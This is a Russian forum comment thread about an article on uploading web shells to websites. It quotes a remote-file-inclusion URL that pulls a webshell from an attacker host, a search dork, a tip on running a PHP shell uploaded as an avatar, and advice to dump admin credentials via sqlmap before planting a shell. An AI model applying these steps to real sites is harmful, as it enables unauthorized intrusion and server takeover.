Burp имхо это mustknow,musthave при работе с вебом... Но это мое имхо...
РАЗБОР
Статья
Способы загрузки шелла/бэкдора на сайт.
В этой статье я хочу рассказать о чаще используемых способах заливки шелла на сайт. Web-shell - это некий вредоносный скрипт (программа), который злоумышленники используют для управления сайтами или серверами. Способ 1 Найти на сайте форму для загрузки файлов/картинок...
Читать разборЧЕГО ?Универсальный метод - это терморектальный криптоанализ и ему подобные техники)
Пиши нормально, по-русски ))
ЧЕГО ?
Пиши нормально, по-русски ))
Можно идиотский вопрос?
Допустим, удалось загрузить файл. Как его запустить? Как прописать запуск файла, например, при обновлении этой страницы
---- Добавлено позже ----
Сразу вопрос - допустим удалось загрузить файл .php через аватарку. Как прописать, что бы он запустился?
Допустим, удалось загрузить файл. Как его запустить? Как прописать запуск файла, например, при обновлении этой страницы
---- Добавлено позже ----
Сразу вопрос - допустим удалось загрузить файл .php через аватарку. Как прописать, что бы он запустился?
просто "бурпсюте" своего рода "швейцарский нож" для пентеста web с кучей дополнительных возможностей и плагинов, а утилита предложенная автором "темпер дата", лишь узко заточенная утилита)))
Надеюсь пользователи сайта будут более терпимыми друг к другу
---- Добавлено позже ----
друзья почему столько негатива)))
лишь о общении рождается истина)))
Последнее редактирование модератором:
ur damn right !Burp имхо это mustknow,musthave при работе с вебом... Но это мое имхо...
Обратитесь к нему по прямой ссылке.Сразу вопрос - допустим удалось загрузить файл .php через аватарку. Как прописать, что бы он запустился?
Например, Ваш аватар на данном форуме
Код:
https://codeby.net/data/avatars/s/82/82940.jpg
Код:
https://codeby.net/data/avatars/s/82/82940.php
я нашел уязвимость xsrf через w3af скажи ево можно взломать через 4 способ если да то как найти ссылку для загрузки шеллаСпособ 6Php-injection - это форма атаки на сайт, когда атакующий внедряет свой php-код в атакуемое php-приложение.
Выполнив команду мы подгрузим страницу home,html. Теперь мы попробуем подгрузить вредоносный шелл.Код:www.site.ru?page=home.html
Дорк: InurlКод:www.site.ru?page=http:/hacker.ru/webshell.phpage=
Также есть способ найти уже залитый шелл с помощью perl скрипта.
Подробная видеоинструкция:
PERL/CА если на сайте нельзя запусткать PHP скрипты?
Все гораздо проще гайсы))))
Берется сперва ищется вектор для загрузки веб шелла)
К примеру если CMS WordPress или Joomla последней версии без уязвимых плагинов - то загрузка шелла только после доступа к админ панели возможна))) И никакие тампер дата и выше описанные методы не помогут , и даже супер пупер универсальные))) Хеххех))
Если бы был супер универсальный метод у этого мембера то он бы в комментах не писал а заскринил залитый шелл на этом форуме)
То бишь хотите сказать можно даже откинуть вариант по поиску собственноручно уязвимостей в плагинах, темах и тд. ?
Данная статья не о чем,паблик с ютуба и не годится для 2018 ,все выше описанное работает только на г***о сайтах типа "Hello World !"
Юзайте эксплоиты Offensive Security’s Exploit Database Archive , WPScan Vulnerability Database (НЕ РЕКЛАМА)
Находите уязвимости через axunetix,sqlmap, сливайте админов и заливайте шелл
Юзайте эксплоиты Offensive Security’s Exploit Database Archive , WPScan Vulnerability Database (НЕ РЕКЛАМА)
Находите уязвимости через axunetix,sqlmap, сливайте админов и заливайте шелл
Последнее редактирование модератором:
какой по советуешь и как лучше его обфуцироть или нет?Данная статья не о чем,паблик с ютуба и не годится для 2018 ,все выше описанное работает только на г***о сайтах типа "Hello World !"
Юзайте эксплоиты Offensive Security’s Exploit Database Archive , WPScan Vulnerability Database (НЕ РЕКЛАМА)
Находите уязвимости через axunetix,sqlmap, сливайте админов и заливайте шелл
Я описал стандартные способы, конечно находят новые узявимости, в Drupal, Apache, ты прочитай внимательней, я описал несколько эксплоитов, с помощью которых была массовая заливка. Твой комментарий не о чем, лучше бы рассказал об уязвимостях. И да это работает на самонаписных сайтахДанная статья не о чем,паблик с ютуба и не годится для 2018 ,все выше описанное работает только на г***о сайтах типа "Hello World !"
Юзайте эксплоиты Offensive Security’s Exploit Database Archive , WPScan Vulnerability Database (НЕ РЕКЛАМА)
Находите уязвимости через axunetix,sqlmap, сливайте админов и заливайте шелл
Поиск в обсуждении
Продолжить чтение
Следующий разбор
Песочница, в которой прятался враг
Ещё по теме
4
Поделиться:
Комментарии
35